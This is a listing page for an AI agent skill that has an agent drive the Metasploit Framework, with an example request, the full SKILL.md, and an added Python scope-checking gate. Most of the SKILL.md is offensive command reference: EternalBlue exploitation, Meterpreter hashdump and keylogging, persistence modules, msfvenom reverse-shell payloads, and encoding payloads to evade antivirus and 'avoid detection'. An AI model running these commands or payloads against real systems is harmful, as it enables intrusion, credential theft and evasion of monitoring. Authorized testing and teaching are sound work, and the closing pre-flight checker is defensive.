metasploit-framework
⚠️ AUTHORIZED USE ONLY
> This skill is for educational purposes or authorized security assessments only.
> You must have explicit, written permission from the system owner before using this tool.
> Misuse of this tool is illegal and strictly prohibited.
About this skill
This AI agent skill provides an interface to the Metasploit Framework, a widely used open-source penetration testing and exploit development platform. It enables an AI agent to perform the stages of an ethical hacking engagement, including reconnaissance, vulnerability scanning, exploitation of identified weaknesses, and post-exploitation operations. The skill is designed to assist security professionals in conducting security assessments, red teaming exercises, and advanced cybersecurity education. **Crucially, the use of this skill is strictly limited to explicitly authorized contexts.** These are educational labs, research environments, and security assessments conducted with prior written permission from the system owner; the restriction exists to prevent misuse, ensure legal compliance, and adhere to ethical hacking principles. Misuse of this tool is illegal and strictly prohibited.
Best use case
- **Authorized Penetration Testing**: Assisting security teams in conducting authorized penetration tests against their own infrastructure or client systems with explicit, written consent.
- **Vulnerability Research and Validation**: An AI agent can utilize this skill to validate known vulnerabilities or research new exploit techniques in a controlled, isolated laboratory environment.
- **Cybersecurity Education and Training**: Providing a hands-on, ethical learning environment for students and professionals to understand offensive security tactics under strict supervision.
- **Automated Security Assessment**: Integrating into CI/CD pipelines for automated, consented security checks against staging or development environments.
- Identification and successful exploitation of vulnerabilities within an authorized target system in a controlled manner.
- Establishment of command-and-control sessions (e.g., Meterpreter) on vulnerable targets within a controlled environment.
- Detailed reports on identified weaknesses, successful penetration paths, and potential mitigation strategies.
- Enhanced understanding of system vulnerabilities and exploitation techniques through practical application.
Practical example
Example input
```json
{
  "skill": "metasploit-framework",
  "action": "orchestrate_attack_sequence",
  "parameters": {
    "target": "192.168.1.100",
    "scope": "initial_reconnaissance_and_vulnerability_scan",
    "exploit_strategy": "attempt_known_vulnerabilities_based_on_scan_results",
    "authorization_status": "explicitly_authorized_for_pentest_on_test_lab"
  }
}
```
Example output
```json
{
  "skill": "metasploit-framework",
  "status": "success",
  "results": {
    "reconnaissance_status": "completed",
    "vulnerabilities_found": [
      {"cve_id": "CVE-2017-0143", "description": "SMBv1 RCE (EternalBlue)", "severity": "critical"},
      {"cve_id": "CVE-2020-0796", "description": "SMBGhost (Windows SMB RCE)", "severity": "high"}
    ],
    "exploit_attempts": [
      {
        "exploit_module": "exploit/windows/smb/ms17_010_eternalblue",
        "target": "192.168.1.100",
        "status": "successful",
        "session_id": 1,
        "session_type": "meterpreter"
      }
    ],
    "post_exploitation_suggestions": ["migrate_process", "dump_credentials", "escalate_privileges"],
    "disclaimer": "All actions performed under explicit authorization for educational/assessment purposes."
  }
}
```
When to use this skill
- When you possess explicit, written permission from the owner of the target system to perform security assessments.
- In a sandboxed, isolated lab environment strictly for educational purposes, vulnerability research, or exploit development.
- As an integral part of an authorized red team exercise with clearly defined scope, rules of engagement, and legal agreements.
- When conducting internal security audits on systems that you legally own and control.
When not to use this skill
- Without explicit, written permission from the system owner for any target, regardless of intent.
- For any illegal or unauthorized activities, including gaining unauthorized access to systems or data.
- Against production systems without a comprehensive risk assessment, prior consent, and a clear rollback plan.
- If you are unsure of the legal implications, ethical boundaries, or potential impact of its use.
Installation
Manual Installation
- Download SKILL.md from GitHub
- Place it in `.claude/skills/metasploit-framework/SKILL.md` inside your project
- Restart your AI agent; it will auto-discover the skill
How metasploit-framework Compares
| Feature / Agent | metasploit-framework | Standard Approach |
|---|---|---|
| Platform Support | Claude | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | medium | N/A |
Frequently Asked Questions
Which AI agents support this skill?
This skill is designed for Claude.
How difficult is it to install?
The installation complexity is rated as medium. You can find the installation instructions above.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
SKILL.md Source
# Metasploit Framework

> **⚠️ AUTHORIZED USE ONLY**
> This skill is for educational purposes or authorized security assessments only.
> You must have explicit, written permission from the system owner before using this tool.
> Misuse of this tool is illegal and strictly prohibited.

## Purpose

Leverage the Metasploit Framework for comprehensive penetration testing, from initial exploitation through post-exploitation activities. Metasploit provides a unified platform for vulnerability exploitation, payload generation, auxiliary scanning, and maintaining access to compromised systems during authorized security assessments.

## Prerequisites

### Required Tools

```bash
# Metasploit must already be installed before using this skill.
# Kali Linux usually ships with it preinstalled.
msfconsole --version
```

Installation varies by operating system and package source. Follow your platform's documented package-manager or vendor installation process before using this skill. Do not rely on an unpinned remote installer script from inside this skill.

If you want database-backed features such as workspace tracking, initialize `msfdb` using the instructions for your local installation. This skill assumes Metasploit is already available and does not require `sudo`, `systemctl`, or other privileged host-level setup steps.

### Required Knowledge

- Network and system fundamentals
- Understanding of vulnerabilities and exploits
- Basic programming concepts
- Target enumeration techniques

### Required Access

- Written authorization for testing
- Network access to target systems
- Understanding of scope and rules of engagement

Before running exploit modules, ask the user to confirm the exact target host, scope, and authorization state.

## Outputs and Deliverables

1. **Exploitation Evidence** - Screenshots and logs of successful compromises
2. **Session Logs** - Command history and extracted data
3. **Vulnerability Mapping** - Exploited vulnerabilities with CVE references
4. **Post-Exploitation Artifacts** - Credentials, files, and system information

## Core Workflow

### Phase 1: MSFConsole Basics

Launch and navigate the Metasploit console:

```bash
# Start msfconsole
msfconsole

# Quiet mode (skip banner)
msfconsole -q

# Basic navigation commands
msf6 > help                   # Show all commands
msf6 > search [term]          # Search modules
msf6 > use [module]           # Select module
msf6 > info                   # Show module details
msf6 > show options           # Display required options
msf6 > set [OPTION] [value]   # Configure option
msf6 > run / exploit          # Execute module
msf6 > back                   # Return to main console
msf6 > exit                   # Exit msfconsole
```

### Phase 2: Module Types

Understand the different module categories:

```bash
# 1. Exploit Modules - Target specific vulnerabilities
msf6 > show exploits
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# 2. Payload Modules - Code executed after exploitation
msf6 > show payloads
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# 3. Auxiliary Modules - Scanning, fuzzing, enumeration
msf6 > show auxiliary
msf6 > use auxiliary/scanner/smb/smb_version

# 4. Post-Exploitation Modules - Actions after compromise
msf6 > show post
msf6 > use post/windows/gather/hashdump

# 5. Encoders - Obfuscate payloads
msf6 > show encoders
msf6 > set ENCODER x86/shikata_ga_nai

# 6. Nops - No-operation padding for buffer overflows
msf6 > show nops

# 7. Evasion - Bypass security controls
msf6 > show evasion
```

### Phase 3: Searching for Modules

Find appropriate modules for targets:

```bash
# Search by name
msf6 > search eternalblue

# Search by CVE
msf6 > search cve:2017-0144

# Search by platform
msf6 > search platform:windows type:exploit

# Search by type and keyword
msf6 > search type:auxiliary smb

# Filter by rank (excellent, great, good, normal, average, low, manual)
msf6 > search rank:excellent

# Combined search
msf6 > search type:exploit platform:linux apache

# Search result columns:
# Name, Disclosure Date, Rank, Check (whether the module can verify the vulnerability), Description
```

### Phase 4: Configuring Exploits

Set up an exploit for execution:

```bash
# Select exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Set target host
msf6 exploit(...) > set RHOSTS 192.168.1.100

# Set target port (if different from default)
msf6 exploit(...) > set RPORT 445

# View compatible payloads
msf6 exploit(...) > show payloads

# Set payload
msf6 exploit(...) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Set local host for reverse connection
msf6 exploit(...) > set LHOST 192.168.1.50
msf6 exploit(...) > set LPORT 4444

# View all options again to verify
msf6 exploit(...) > show options

# Check if target is vulnerable (if supported)
msf6 exploit(...) > check

# Execute exploit
msf6 exploit(...) > exploit
# or
msf6 exploit(...) > run
```

### Phase 5: Payload Types

Select the appropriate payload for the situation:

```bash
# Singles - Self-contained, no staging
windows/shell_reverse_tcp
linux/x86/shell_bind_tcp

# Stagers - Small payload that downloads a larger stage
windows/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp

# Stages - Downloaded by the stager, provide full functionality
# Meterpreter, VNC, shell

# Payload naming convention:
# [platform]/[architecture]/[payload_type]/[connection_type]

# Examples:
windows/x64/meterpreter/reverse_tcp
linux/x86/shell/bind_tcp
php/meterpreter/reverse_tcp
java/meterpreter/reverse_https
android/meterpreter/reverse_tcp
```

### Phase 6: Meterpreter Session

Work with Meterpreter post-exploitation:

```bash
# After successful exploitation, you get the Meterpreter prompt
meterpreter >

# System Information
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# File System Operations
meterpreter > pwd
meterpreter > ls
meterpreter > cd C:\\Users
meterpreter > download file.txt /tmp/
meterpreter > upload /tmp/tool.exe C:\\

# Process Management
meterpreter > ps
meterpreter > migrate [PID]
meterpreter > kill [PID]

# Networking
meterpreter > ipconfig
meterpreter > netstat
meterpreter > route
meterpreter > portfwd add -l 8080 -p 80 -r 10.0.0.1

# Privilege Escalation
meterpreter > getsystem
meterpreter > getprivs

# Credential Harvesting
meterpreter > hashdump
meterpreter > run post/windows/gather/credentials/credential_collector

# Screenshots and Keylogging
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop

# Shell Access
meterpreter > shell
C:\Windows\system32> whoami
C:\Windows\system32> exit
meterpreter >

# Background Session
meterpreter > background
msf6 exploit(...) > sessions -l
msf6 exploit(...) > sessions -i 1
```

### Phase 7: Auxiliary Modules

Use auxiliary modules for reconnaissance:

```bash
# SMB Version Scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run

# Port Scanner
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set PORTS 1-1000
msf6 auxiliary(...) > run

# SSH Version Scanner
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(...) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(...) > run

# FTP Anonymous Login
msf6 > use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run

# HTTP Directory Scanner
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > run

# Brute Force Modules
msf6 > use auxiliary/scanner/ssh/ssh_login
msf6 auxiliary(...) > set RHOSTS 192.168.1.100
msf6 auxiliary(...) > set USER_FILE /usr/share/wordlists/users.txt
msf6 auxiliary(...) > set PASS_FILE /usr/share/wordlists/rockyou.txt
msf6 auxiliary(...) > run
```

### Phase 8: Post-Exploitation Modules

Run post modules on active sessions:

```bash
# List sessions
msf6 > sessions -l

# Run post module on a specific session
msf6 > use post/windows/gather/hashdump
msf6 post(windows/gather/hashdump) > set SESSION 1
msf6 post(...) > run

# Or run directly from Meterpreter
meterpreter > run post/windows/gather/hashdump

# Common Post Modules

# Credential Gathering
post/windows/gather/credentials/credential_collector
post/windows/gather/lsa_secrets
post/windows/gather/cachedump
post/multi/gather/ssh_creds

# System Enumeration
post/windows/gather/enum_applications
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_shares
post/linux/gather/enum_configs

# Privilege Escalation
post/windows/escalate/getsystem
post/multi/recon/local_exploit_suggester

# Persistence
post/windows/manage/persistence_exe
post/linux/manage/sshkey_persistence

# Pivoting
post/multi/manage/autoroute
```

### Phase 9: Payload Generation with msfvenom

Create standalone payloads:

```bash
# Basic Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf

# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.php

# Python reverse shell
msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw -o shell.py

# PowerShell payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh -o shell.ps1

# ASP web shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f asp -o shell.asp

# WAR file (Tomcat)
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f war -o shell.war

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -o shell.apk

# Encoded payload (evade AV)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

# List available formats
msfvenom --list formats

# List available encoders
msfvenom --list encoders
```

### Phase 10: Setting Up Handlers

Configure a listener for incoming connections:

```bash
# Manual handler setup
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j

# The -j flag runs the handler as a background job
msf6 > jobs -l

# When the payload executes on the target, a session opens
[*] Meterpreter session 1 opened

# Interact with session
msf6 > sessions -i 1
```

## Quick Reference

### Essential MSFConsole Commands

| Command | Description |
|---------|-------------|
| `search [term]` | Search for modules |
| `use [module]` | Select a module |
| `info` | Display module information |
| `show options` | Show configurable options |
| `set [OPT] [val]` | Set option value |
| `setg [OPT] [val]` | Set global option |
| `run` / `exploit` | Execute module |
| `check` | Verify target vulnerability |
| `back` | Deselect module |
| `sessions -l` | List active sessions |
| `sessions -i [N]` | Interact with session |
| `jobs -l` | List background jobs |
| `db_nmap` | Run nmap with database |

### Meterpreter Essential Commands

| Command | Description |
|---------|-------------|
| `sysinfo` | System information |
| `getuid` | Current user |
| `getsystem` | Attempt privilege escalation |
| `hashdump` | Dump password hashes |
| `shell` | Drop to system shell |
| `upload/download` | File transfer |
| `screenshot` | Capture screen |
| `keyscan_start` | Start keylogger |
| `migrate [PID]` | Move to another process |
| `background` | Background session |
| `portfwd` | Port forwarding |

### Common Exploit Modules

```bash
# Windows
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms08_067_netapi
exploit/windows/http/iis_webdav_upload_asp
exploit/windows/local/bypassuac

# Linux
exploit/linux/ssh/sshexec
exploit/linux/local/overlayfs_priv_esc
exploit/multi/http/apache_mod_cgi_bash_env_exec

# Web Applications
exploit/multi/http/tomcat_mgr_upload
exploit/unix/webapp/wp_admin_shell_upload
exploit/multi/http/jenkins_script_console
```

## Constraints and Limitations

### Legal Requirements

- Only use on systems you own or have written authorization to test
- Document all testing activities
- Follow rules of engagement
- Report all findings to appropriate parties

### Technical Limitations

- Modern AV/EDR may detect Metasploit payloads
- Some exploits require specific target configurations
- Firewall rules may block reverse connections
- Not all exploits work on all target versions

### Operational Security

- Use encrypted channels (reverse_https) when possible
- Clean up artifacts after testing
- Avoid detection by monitoring systems
- Limit post-exploitation to agreed scope

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Database not connected | Run `sudo msfdb init`, start PostgreSQL, then `db_connect` |
| Exploit fails/no session | Run `check`; verify payload architecture; check firewall; try different payloads |
| Session dies immediately | Migrate to a stable process; use a stageless payload; check AV; use AutoRunScript |
| Payload detected by AV | Use encoding `-e x86/shikata_ga_nai -i 10`; use evasion modules; custom templates |

## When to Use

This skill applies when executing the workflow or actions described in the overview.
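The SKILL.md above leaves three checks to the operator: the Required Access note says to confirm the exact target host, scope and authorization before running exploit modules; Phase 5 documents the `[platform]/[architecture]/[payload_type]/[connection_type]` naming convention; and the troubleshooting table says to verify the payload architecture when no session comes back. The following Python is an added example written for this page, not code from the metasploit-framework skill or from Metasploit: it subtracts an authorized CIDR list from an `RHOSTS` value and reports any range that spills outside it (a /23 against a /24 scope is partially covered, which a simple "is the host in scope" test would miss), parses a payload name into its parts while handling the optional architecture segment and the stageless `type_connection` form, and combines both into a pre-flight gate an orchestrating agent can run before `exploit`/`run`. The scope list, `RHOSTS` values, `KNOWN_ARCHES` subset and payload names are constructed for illustration.

```python
"""Pre-flight checks before an orchestrating agent runs a Metasploit module.

Added example for this page; not code from the metasploit-framework skill or
from Metasploit. The authorized scope, RHOSTS values and payload names are
constructed for illustration.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass
from typing import Optional

# Constructed: the networks the written authorization covers (assumption).
AUTHORIZED_SCOPE = ["192.168.1.0/24", "10.10.0.0/16"]

# Architecture segments that may appear in a payload name. Assumption: a
# representative subset, not Metasploit's full architecture list.
KNOWN_ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe"}


def parse_rhosts(rhosts: str) -> list:
    """Turn an RHOSTS value (single hosts and/or CIDRs, space-separated) into
    network objects. A bare host becomes a /32 (or /128) so every token is
    compared as a range."""
    return [ipaddress.ip_network(tok, strict=False) for tok in rhosts.split()]


def out_of_scope(rhosts: str, scope: list = AUTHORIZED_SCOPE) -> list:
    """Return the parts of RHOSTS not covered by any authorized network.

    A single CIDR can be partially covered (a /23 against a /24 scope), so each
    authorized network is subtracted from the target range and whatever remains
    is reported. An empty list means the whole target set is in scope."""
    allowed = [ipaddress.ip_network(s) for s in scope]
    leftovers = []
    for net in parse_rhosts(rhosts):
        remaining = [net]
        for auth in allowed:
            nxt = []
            for rng in remaining:
                if rng.version != auth.version or not rng.overlaps(auth):
                    nxt.append(rng)                          # other family or disjoint
                elif rng.subnet_of(auth):
                    continue                                 # fully covered: drop it
                else:
                    nxt.extend(rng.address_exclude(auth))    # carve out the covered part
            remaining = nxt
        leftovers.extend(remaining)
    return [str(n) for n in leftovers]


@dataclass
class PayloadName:
    platform: str
    arch: Optional[str]        # None when the name carries no architecture segment
    kind: str                  # meterpreter, shell, vncinject, ...
    connection: Optional[str]  # reverse_tcp, bind_tcp, reverse_https, ...
    staged: bool               # True for type/connection, False for type_connection


def parse_payload(name: str) -> PayloadName:
    """Split [platform]/[architecture]/[payload_type]/[connection_type].

    The architecture segment is optional (php/meterpreter/reverse_tcp), and
    singles or stageless payloads join type and connection with '_'
    (windows/shell_reverse_tcp, linux/x86/shell_bind_tcp)."""
    parts = name.strip().split("/")
    if len(parts) < 2 or not all(parts):
        raise ValueError(f"not a payload name: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest[0] in KNOWN_ARCHES else None
    if len(rest) == 2:                        # staged: type/connection
        kind, conn = rest
        return PayloadName(platform, arch, kind, conn, staged=True)
    if len(rest) == 1:                        # single or stageless: type_connection
        kind, _, conn = rest[0].partition("_")
        return PayloadName(platform, arch, kind, conn or None, staged=False)
    raise ValueError(f"unexpected payload shape: {name!r}")


def preflight(rhosts: str, payload: str, authorization_confirmed: bool,
              target_platform: Optional[str] = None,
              target_arch: Optional[str] = None,
              scope: list = AUTHORIZED_SCOPE) -> list:
    """Return the blocking problems for a planned run; empty means it may proceed.

    target_platform/target_arch are what enumeration reported (e.g. from
    smb_version); when given, they are compared with the payload name."""
    problems = []
    if not authorization_confirmed:
        problems.append("user has not confirmed target, scope and authorization")
    outside = out_of_scope(rhosts, scope)
    if outside:
        problems.append("RHOSTS ranges outside authorized scope: " + ", ".join(outside))
    try:
        p = parse_payload(payload)
    except ValueError as exc:
        return problems + [str(exc)]
    if target_platform and p.platform != target_platform:
        problems.append(f"payload platform {p.platform} != target {target_platform}")
    # A name without an arch segment (windows/meterpreter/reverse_tcp) implies
    # the default architecture, so only an explicit segment is compared.
    if target_arch and p.arch and p.arch != target_arch:
        problems.append(f"payload arch {p.arch} != target {target_arch}")
    return problems


if __name__ == "__main__":
    # Constructed values: a /23 that spills outside the authorized /24.
    for problem in preflight("192.168.0.0/23", "windows/x64/meterpreter/reverse_tcp",
                             authorization_confirmed=False):
        print("BLOCK:", problem)
```

Run the gate with the `RHOSTS` string exactly as it will be passed to `set RHOSTS`, so that a later edit to the target list cannot diverge from what was checked; a non-empty return value means the agent should stop and report rather than call `exploit`.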